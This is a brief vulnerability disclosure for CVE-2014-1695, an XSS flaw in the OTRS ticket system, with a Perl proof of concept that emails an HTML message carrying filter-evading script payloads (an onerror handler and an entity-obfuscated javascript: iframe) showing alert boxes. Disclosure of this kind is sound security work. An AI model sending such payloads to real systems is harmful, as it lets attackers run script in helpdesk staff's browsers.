CVE-2014-1695Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 allows remote attackers to inject arbitrary web script or HTML via a crafted HTML email.

Proof of Concept:

#!/usr/bin/perl -w
# OTRS XSS PoC
# (C) 2014 Adam Ziaja <adam@adamziaja.com> http://adamziaja.com
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
    Subject => 'OTRS XSS PoC',
    From => 'attacker@example.com',
    To => 'otrs@example.com',
    Type => 'text/html',
    Data =>
        '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'
);
$msg->send();
        

Adam Ziaja <adam@adamziaja.com>